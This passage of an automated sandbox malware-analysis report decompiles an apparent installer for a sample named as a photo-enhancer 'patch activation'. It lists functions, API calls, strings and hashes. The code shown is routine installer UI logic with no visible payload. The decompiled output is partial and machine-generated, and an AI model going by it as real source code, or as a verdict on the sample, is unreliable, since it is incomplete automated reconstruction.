					goto L12;
				} else {
					return DeleteMenu(_t46, 0xf010, 0);
				}
			}

0x00423d04
0x00423d08
0x00423d0e
0x00423e3b
0x00423e3b
0x00423e3b
0x00423d1a
0x00423d1f
0x00423d23
0x00423d29
0x00423d36
0x00423d38
0x00423d3d
0x00423d4c
0x00423d4f
0x00423d5d
0x00423d62
0x00423d62
0x00423d4f
0x00423d69
0x00423d6e
0x00423d70
0x00423d72
0x00423d72
0x00423d75
0x00423d7d
0x00423d7f
0x00423d81
0x00423d81
0x00423d84
0x00423d85
0x00423d87
0x00423d89
0x00423d8b
0x00423d8d
0x00423d92
0x00423d93
0x00423d95
0x00423d98
0x00423da4
0x00423da9
0x00423dae
0x00423db1
0x00423db4
0x00423db9
0x00423dc2
0x00423dc5
0x00423dca
0x00423dd0
0x00423dd4
0x00423de0
0x00423de4
0x00423df1
0x00423df5
0x00423df5
0x00423dfc
0x00423e05
0x00423e0f
0x00423e1c
0x00423e28
0x00000000
0x00423e2a
0x00000000
0x00423e32

APIs

Part of subcall function 0041F854: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041F234,?,00423D1F,0042409C,0041F234), ref: 0041F872

GetClassInfoA.USER32 ref: 00423D2F
RegisterClassA.USER32 ref: 00423D47
GetSystemMetrics.USER32 ref: 00423D69
GetSystemMetrics.USER32 ref: 00423D78
SetWindowLongA.USER32 ref: 00423DD4
SendMessageA.USER32 ref: 00423DF5
GetSystemMenu.USER32(004108F0,00000000,004108F0,000000FC,00423B1C,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00400000), ref: 00423E00
DeleteMenu.USER32(00000000,0000F030,00000000,004108F0,00000000,004108F0,000000FC,00423B1C,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423E0F
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004108F0,00000000,004108F0,000000FC,00423B1C,00000000,00400000,00000000,00000000,00000000), ref: 00423E1C
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004108F0,00000000,004108F0,000000FC,00423B1C,00000000,00400000), ref: 00423E32

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID:
API String ID: 183575631-0
Opcode ID: aeea6ed96da726cf0390846aab0a070c3404cae578d0716d11b5eb43d210982e
Instruction ID: 3c08988f126546789c3863b6090fce38962bc241f8b01a8198fec2671c318d21
Opcode Fuzzy Hash: aeea6ed96da726cf0390846aab0a070c3404cae578d0716d11b5eb43d210982e
Instruction Fuzzy Hash: B73173B17402506AEB10AF69EC82F6736989714709F60017BFA44EE2D7D6BDED00876D

Uniqueness

Uniqueness Score: -1.00%

Function 004539C8 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E004539C8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _t13;
				intOrPtr _t36;
				intOrPtr _t42;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t42);
				_push(0x453a86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				 *0x49eff8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64DisableWow64FsRedirection");
				 *0x49effc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64RevertWow64FsRedirection");
				if( *0x49eff8 == 0 ||  *0x49effc == 0) {
					_t13 = 0;
				} else {
					_t13 = 1;
				}
				 *0x49f000 = _t13;
				E0042DD54( &_v12);
				E0042C88C(_v12,  &_v8);
				E0040357C( &_v8, "shell32.dll");
				E0042E824(_v8, _t27, 0x8000); // executed
				E0042ED58(0x4c783afb,  &_v8);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00453A8D);
				return E00403420( &_v12, 2);
			}

0x004539c8
0x004539cb
0x004539cd
0x004539cf
0x004539d4
0x004539d5
0x004539da
0x004539dd
0x004539f5
0x00453a0f
0x00453a1b
0x00453a26
0x00453a2a
0x00453a2a
0x00453a2a
0x00453a2c
0x00453a34
0x00453a3f
0x00453a4c
0x00453a59
0x00453a66
0x00453a6d
0x00453a70
0x00453a73
0x00453a85

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453A86,?,?,?,?,00000000,00000000,?,0049BA8A), ref: 004539EA
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004539F0
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453A86,?,?,?,?,00000000,00000000,?,0049BA8A), ref: 00453A04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453A0A

Strings

Wow64DisableWow64FsRedirection, xrefs: 004539E0
kernel32.dll, xrefs: 004539E5, 004539FF
Wow64RevertWow64FsRedirection, xrefs: 004539FA
shell32.dll, xrefs: 00453A47

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 1e37e0ab1df9e757d704b947a29f50b329146a292bd817b3065b294340fa9558
Instruction ID: 18891d3ceb8887e2f5320c13b89f4eae329e81661ad9de64afed935a1ef9114c
Opcode Fuzzy Hash: 1e37e0ab1df9e757d704b947a29f50b329146a292bd817b3065b294340fa9558
Instruction Fuzzy Hash: EA119130644255BEEB00EF72D802B5E77A8D74479AF60447BF88066292D67C9E4C8A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00468610 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00468610(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				int _v8;
				char _v348;
				int _v356;
				struct _SHFILEINFO _v360;
				char _v364;
				int _t62;
				int _t77;
				void* _t80;
				intOrPtr _t86;
				char* _t91;
				void* _t92;
				void* _t93;
				void* _t97;
				void* _t98;
				intOrPtr _t114;
				intOrPtr _t115;
				void* _t131;
				void* _t132;
				intOrPtr _t133;

				_t129 = __esi;
				_t128 = __edi;
				_t131 = _t132;
				_t133 = _t132 + 0xfffffe98;
				_push(__esi);
				_push(__edi);
				_v364 = 0;
				_v8 = 0;
				_push(_t131);
				_push(0x468802);
				_push( *[fs:eax]);
				 *[fs:eax] = _t133;
				E00414AAC( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), 0x20);
				E00414ACC( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), 0x20);
				E00414AAC( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), 0x20);
				E00414ACC( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), 0x20);
				_push(_t131);
				_push(0x4687d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t133;
				_t62 = SHGetFileInfo("c:\\directory", 0x10,  &_v360, 0x160, 0x1010); // executed
				if(_t62 != 0 && _v348 != 0) {
					_t97 =  *0x49e014; // 0x400000
					_t98 = ExtractIconA(_t97,  &_v348, _v356); // executed
					E0046854C(_t98,  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), __edi);
				}
				if(E0047AF78(6, 0) == 0) {
					E0047F570(0, 2, _t128, _t129, __eflags,  &_v8);
					__eflags = _v8;
					if(_v8 == 0) {
						__eflags = 0;
						E0047F570(1, 2, _t128, _t129, 0,  &_v8);
					}
					__eflags = _v8;
					if(_v8 != 0) {
						_t77 = SHGetFileInfo(E00403738(_v8), 0,  &_v360, 0x160, 0x1000);
						__eflags = _t77;
						if(_t77 != 0) {
							__eflags = _v348;
							if(_v348 != 0) {
								_t80 =  *0x49e014; // 0x400000
								E0046854C(ExtractIconA(_t80,  &_v348, _v356),  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), _t128);
							}
						}
					}
				} else {
					_t86 =  *0x49f198; // 0x2311090
					E0042C88C(_t86,  &_v364);
					E0040357C( &_v364, "shell32.dll");
					_t91 = E00403738(_v364);
					_t92 =  *0x49e014; // 0x400000
					_t93 = ExtractIconA(_t92, _t91, 0x27); // executed
					E0046854C(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), _t128);
				}
				_pop(_t114);
				 *[fs:eax] = _t114;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00468809);
				E00403400( &_v364);
				return E00403400( &_v8);
			}

0x00468610
0x00468610
0x00468611
0x00468613
0x0046861a
0x0046861b
0x0046861e
0x00468624
0x00468629
0x0046862a
0x0046862f
0x00468632
0x00468646
0x0046865c
0x00468672
0x00468688
0x0046868f
0x00468690
0x00468695
0x00468698
0x004686b3
0x004686ba
0x004686d3
0x004686d9
0x004686ea
0x004686ea
0x004686fa
0x00468755
0x0046875a
0x0046875e
0x00468764
0x0046876a
0x0046876a
0x0046876f
0x00468773
0x00468791
0x00468796
0x00468798
0x0046879a
0x004687a1
0x004687b1
0x004687c8
0x004687c8
0x004687a1
0x00468798
0x004686fc
0x00468704
0x00468709
0x00468719
0x00468724
0x0046872a
0x00468730
0x00468741
0x00468741
0x004687cf
0x004687d2
0x004687e3
0x004687e6
0x004687e9
0x004687f4
0x00468801

APIs

SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004686B3
ExtractIconA.SHELL32(00400000,00000000,?), ref: 004686D9

Part of subcall function 0046854C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004685E7
Part of subcall function 0046854C: DestroyCursor.USER32(00000000), ref: 004685FD

ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00468730
SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00468791
ExtractIconA.SHELL32(00400000,00000000,?), ref: 004687B7

Strings

shell32.dll, xrefs: 00468714
c:\directory, xrefs: 004686AE

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Icon$Extract$FileInfo$CursorDestroyDraw
String ID: c:\directory$shell32.dll
API String ID: 3376378930-1375355148
Opcode ID: 7a772aa265c91b1f74206593db125e0d1db5563dad8a39a26a2e33cb98cd9a9c
Instruction ID: 811d36ee9d093b3b0276aa4c13663b10f9457e770bee0cd4c871c76846c3392c
Opcode Fuzzy Hash: 7a772aa265c91b1f74206593db125e0d1db5563dad8a39a26a2e33cb98cd9a9c
Instruction Fuzzy Hash: D2515070600244AFD710EF55CC8AFDAB7E8AB48305F5082BAF4049B751DA799E81CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00430E20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23
registryclipboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00430E20() {
				char _v4;
				long _v8;
				char _v12;
				char _v16;
				char _v48;
				char _t9;
				short _t13;

				 *0x49e69c = RegisterClipboardFormatA("commdlg_help");
				 *0x49e6a0 = RegisterClipboardFormatA("commdlg_FindReplace");
				_t9 =  *0x49e014; // 0x400000
				_v16 = _t9;
				_v12 = 0;
				_v8 = GetCurrentThreadId();
				_v4 = 0;
				_t13 = GlobalAddAtomA(E00407D50( &_v48,  &_v16, "WndProcPtr%.8X%.8X", 1)); // executed
				 *0x49c7f0 = _t13;
				return _t13;
			}

0x00430e2d
0x00430e3c
0x00430e43
0x00430e48
0x00430e4c
0x00430e56
0x00430e5a
0x00430e72
0x00430e77
0x00430e80

APIs

RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430E28
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430E37
GetCurrentThreadId.KERNEL32 ref: 00430E51
GlobalAddAtomA.KERNEL32 ref: 00430E72

Strings

WndProcPtr%.8X%.8X, xrefs: 00430E63
commdlg_help, xrefs: 00430E23
commdlg_FindReplace, xrefs: 00430E32

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: 18e0ea013f721cf9d0855e1711e424e1ec4dc69dbdb3ee4d586f10aea4099809
Instruction ID: 010e98d13399693fc9d497d8664f6f2789eb24ebecb377ca83b09cc51ba55008
Opcode Fuzzy Hash: 18e0ea013f721cf9d0855e1711e424e1ec4dc69dbdb3ee4d586f10aea4099809
Instruction Fuzzy Hash: 58F082B09483408ED300EB768842B1E7BE4AB58718F404A3FB498A62A1D77A9910CB1F

Uniqueness

Uniqueness Score: -1.00%

Function 004232E0 Relevance: 12.1, APIs: 8, Instructions: 119
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004232E0(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v26;
				struct HWND__* _v32;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t71;
				void* _t76;
				intOrPtr _t102;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t107;
				intOrPtr _t108;

				_t104 = __esi;
				_t103 = __edi;
				_t106 = _t107;
				_t108 = _t107 + 0xffffffe4;
				_push(__ebx);
				_v8 = __eax;
				E00414570();
				if( *((char*)(_v8 + 0x37)) != 0 ||  *((char*)(_v8 + 0x38)) == 0 || ( *(_v8 + 0x119) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x116)) == 1) {
					E0040914C(0x49e62c, 0xf032, 1, _t103, _t104);
					E0040311C();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x119) =  *(_v8 + 0x119) | 0x00000008;
				_v32 = GetActiveWindow();
				_t50 =  *0x49c57c; // 0x3
				_v20 = _t50;
				_t51 =  *0x49e630; // 0x2250660
				_v24 =  *((intOrPtr*)(_t51 + 0x4c));
				_t53 =  *0x49e630; // 0x2250660
				 *((intOrPtr*)(_t53 + 0x4c)) = _v8;
				_t54 =  *0x49e630; // 0x2250660
				_v26 =  *((intOrPtr*)(_t54 + 0x28));
				_t56 =  *0x49e630; // 0x2250660
				E00423824(_t56, 0);
				_t59 = E0041F334(0, 0x49e62c, _t103, _t104); // executed
				_v16 = _t59;
				_push(_t106);
				_push(0x4234ca);
				_push( *[fs:edx]);
				 *[fs:edx] = _t108;
				E00423294(_v8);
				_push(_t106);
				_push(0x423473);
				_push( *[fs:edx]);
				 *[fs:edx] = _t108;
				SendMessageA(E00418670(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x128)) = 0;
				do {
					E0042494C( *0x49e62c, _t103, _t104);
					if( *((char*)( *0x49e62c + 0x7c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x128)) != 0) {
							E004231E4(_v8, 0xf032);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x128)) = 2;
					}
					_t71 =  *((intOrPtr*)(_v8 + 0x128));
				} while (_t71 == 0);
				_v12 = _t71;
				SendMessageA(E00418670(_v8), 0xb001, 0, 0);
				_t76 = E00418670(_v8);
				if(_t76 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(0x42347a);
				return E0042328C();
			}

0x004232e0
0x004232e0
0x004232e1
0x004232e3
0x004232e6
0x004232e7
0x004232ef
0x004232fb
0x0042332a
0x0042332f
0x0042332f
0x0042333b
0x00423349
0x00423349
0x0042334e
0x00423356
0x00423362
0x00423365
0x0042336a
0x0042336d
0x00423375
0x00423378
0x00423380
0x00423383
0x0042338c
0x00423392
0x00423397
0x0042339e
0x004233a3
0x004233a8
0x004233a9
0x004233ae
0x004233b1
0x004233b7
0x004233be
0x004233bf
0x004233c4
0x004233c7
0x004233dc
0x004233e6
0x004233ec
0x004233ee
0x004233f9
0x00423414
0x00423419
0x00423419
0x004233fb
0x004233fe
0x004233fe
0x00423421
0x00423427
0x0042342b
0x00423440
0x00423448
0x00423456
0x0042345a
0x0042345a
0x0042345f
0x00423462
0x00423465
0x00423472

APIs

GetCapture.USER32 ref: 00423334
GetCapture.USER32 ref: 00423343
SendMessageA.USER32 ref: 00423349
ReleaseCapture.USER32(00000000,0000001F,00000000,00000000), ref: 0042334E
GetActiveWindow.USER32 ref: 0042335D
SendMessageA.USER32 ref: 004233DC
SendMessageA.USER32 ref: 00423440
GetActiveWindow.USER32 ref: 0042344F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: f69812db9b2b79ec794c9b8766cda1920263d90c5a2084de5f9108f08cb6d884
Instruction ID: 18bdd7e577e3521af934e8bbd68e58ee55e38e107d312ae6febd14bbc8fb8244
Opcode Fuzzy Hash: f69812db9b2b79ec794c9b8766cda1920263d90c5a2084de5f9108f08cb6d884
Instruction Fuzzy Hash: 07414D30B00254AFDB10EF6AD982B9E77F1AF04704F5440BAE440AB2A2DB7D9F40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00478DC4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00478DC4(intOrPtr __ebx, void* __edi, intOrPtr __esi) {
				char _v5;
				intOrPtr _v12;
				long _v16;
				char _v20;
				char _v24;
				struct _WNDCLASSW _v64;
				char _v68;
				intOrPtr _t75;
				intOrPtr _t76;
				void* _t78;
				intOrPtr _t113;
				intOrPtr _t117;
				void* _t119;
				intOrPtr _t121;
				intOrPtr _t131;
				long _t140;
				int _t149;
				intOrPtr _t157;
				intOrPtr _t166;
				intOrPtr _t168;
				void* _t188;
				void* _t189;
				intOrPtr _t190;
				void* _t195;
				void* _t209;

				_t186 = __esi;
				_t185 = __edi;
				_t155 = __ebx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffc0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v68 = 0;
				_v16 = 0;
				_v20 = 0;
				_push(_t188);
				_push(0x479086);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				_t158 =  *0x49e62c; // 0x2252410
				_t75 = E004790D8(1, __edi); // executed
				_v12 = _t75;
				_push(_t188);
				_push(0x47905c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t190;
				if( *0x49c0dc == 2) {
					_t149 = GetClassInfoW(0, L"COMBOBOX",  &_v64); // executed
					if(_t149 != 0) {
						 *0x49f0dc = _v64.lpfnWndProc;
						 *0x49f0e0 = SetWindowLongW(E00418670( *((intOrPtr*)(_v12 + 0x1bc))), 0xfffffffc, E00478D78);
					}
				}
				_t76 =  *0x49f368; // 0x2252aac
				_t78 =  *((intOrPtr*)(_t76 + 8)) - 1;
				if(_t78 < 0) {
					L15:
					if(( *0x49f320 & 0x00000004) == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x10))() - 1 <= 0) {
						L23:
						if(E0042A4D0( *((intOrPtr*)(_v12 + 0x1bc))) + 1 == 0) {
							_t155 =  *((intOrPtr*)(_v12 + 0x1bc));
							_t168 =  *0x49cc90; // 0x0
							E0042A4EC( *((intOrPtr*)(_v12 + 0x1bc)), E0040C398( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)), _t168));
						}
						_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x10))() - 1;
						if(_t209 <= 0) {
							_v5 = 1;
						} else {
							E004232E0(_v12, _t155, _t185, _t186); // executed
							_v5 = _t209 == 0;
							if(_v5 != 0 && E0042A4D0( *((intOrPtr*)(_v12 + 0x1bc))) >= 0) {
								E004806B8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x14))(),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))));
							}
						}
						_pop(_t166);
						 *[fs:eax] = _t166;
						_push(0x479063);
						return E00402B58(_v12);
					} else {
						_t113 =  *0x49f1ec; // 0x2268b68
						E0047E4A8(_t113, _t158,  &_v68);
						E0047B00C(_v68, _t155, 0, "Inno Setup: Language", _t185, _t186,  &_v20); // executed
						if(_v20 == 0) {
							goto L23;
						}
						_t117 =  *0x49f368; // 0x2252aac
						_t119 =  *((intOrPtr*)(_t117 + 8)) - 1;
						if(_t119 < 0) {
							goto L23;
						}
						_v24 = _t119 + 1;
						_t155 = 0;
						while(1) {
							_t121 =  *0x49f368; // 0x2252aac
							if(E00406F54(_v20,  *((intOrPtr*)(E0040B6DC(_t121, _t155)))) == 0) {
								break;
							}
							_t155 = _t155 + 1;
							_t50 =  &_v24;
							 *_t50 = _v24 - 1;
							if( *_t50 != 0) {
								continue;
							}
							goto L23;
						}
						_t186 =  *((intOrPtr*)(_v12 + 0x1bc));
						E0042A4EC( *((intOrPtr*)(_v12 + 0x1bc)), E0040C398( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)), _t155));
						goto L23;
					}
				} else {
					_v24 = _t78 + 1;
					_t157 = 0;
					do {
						_t131 =  *0x49f368; // 0x2252aac
						_t186 = E0040B6DC(_t131, _t157);
						_t195 = _t157 -  *0x49cc90; // 0x0
						if(_t195 == 0 ||  *((intOrPtr*)(_t186 + 0x2c)) == 0 || GetACP() ==  *((intOrPtr*)(_t186 + 0x2c)) || ( *0x49f31f & 0x00000080) != 0) {
							_t158 = 0x4790b4;
							E004035C0( &_v16, 0x4790b4,  *((intOrPtr*)(_t186 + 4)));
							if( *0x49c0dc != 2) {
								E00403BA4();
								_t158 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc))));
								_t140 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x2c))();
							} else {
								_t140 = SendMessageW(E00418670( *((intOrPtr*)(_v12 + 0x1bc))), 0x143, 0, _v16); // executed
							}
							if(_t140 >= 0) {
								_t158 = _t157;
								_t186 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc))));
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x20))();
							}
						}
						_t157 = _t157 + 1;
						_t32 =  &_v24;
						 *_t32 = _v24 - 1;
					} while ( *_t32 != 0);
					goto L15;
				}
			}

0x00478dc4
0x00478dc4
0x00478dc4
0x00478dc5
0x00478dc7
0x00478dca
0x00478dcb
0x00478dcc
0x00478dcf
0x00478dd2
0x00478dd5
0x00478dda
0x00478ddb
0x00478de0
0x00478de3
0x00478de6
0x00478df3
0x00478df8
0x00478dfd
0x00478dfe
0x00478e03
0x00478e06
0x00478e10
0x00478e1d
0x00478e24
0x00478e29
0x00478e49
0x00478e49
0x00478e24
0x00478e4e
0x00478e56
0x00478e59
0x00478f15
0x00478f1c
0x00478fb3
0x00478fc2
0x00478fc7
0x00478fd3
0x00478fe2
0x00478fe2
0x00478ffb
0x00478ffc
0x00479042
0x00478ffe
0x00479001
0x00479007
0x0047900f
0x0047903b
0x0047903b
0x0047900f
0x00479048
0x0047904b
0x0047904e
0x0047905b
0x00478f39
0x00478f40
0x00478f45
0x00478f54
0x00478f5d
0x00000000
0x00000000
0x00478f5f
0x00478f67
0x00478f6a
0x00000000
0x00000000
0x00478f6d
0x00478f70
0x00478f72
0x00478f74
0x00478f8a
0x00000000
0x00000000
0x00478fad
0x00478fae
0x00478fae
0x00478fb1
0x00000000
0x00000000
0x00000000
0x00478fb1
0x00478f8f
0x00478fa6
0x00000000
0x00478fa6
0x00478e5f
0x00478e60
0x00478e63
0x00478e65
0x00478e67
0x00478e71
0x00478e73
0x00478e79
0x00478e97
0x00478e9f
0x00478eab
0x00478ed4
0x00478eeb
0x00478eed
0x00478ead
0x00478ec7
0x00478ec7
0x00478ef2
0x00478f03
0x00478f06
0x00478f08
0x00478f08
0x00478ef2
0x00478f0b
0x00478f0c
0x00478f0c
0x00478f0c
0x00000000
0x00478e65

APIs

GetClassInfoW.USER32 ref: 00478E1D
SetWindowLongW.USER32(00000000,000000FC,00478D78), ref: 00478E44
GetACP.KERNEL32(00000000,0047905C,?,00000000,00479086), ref: 00478E81
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00478EC7

Strings

COMBOBOX, xrefs: 00478E16
Inno Setup: Language, xrefs: 00478F4F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ClassInfoLongMessageSendWindow
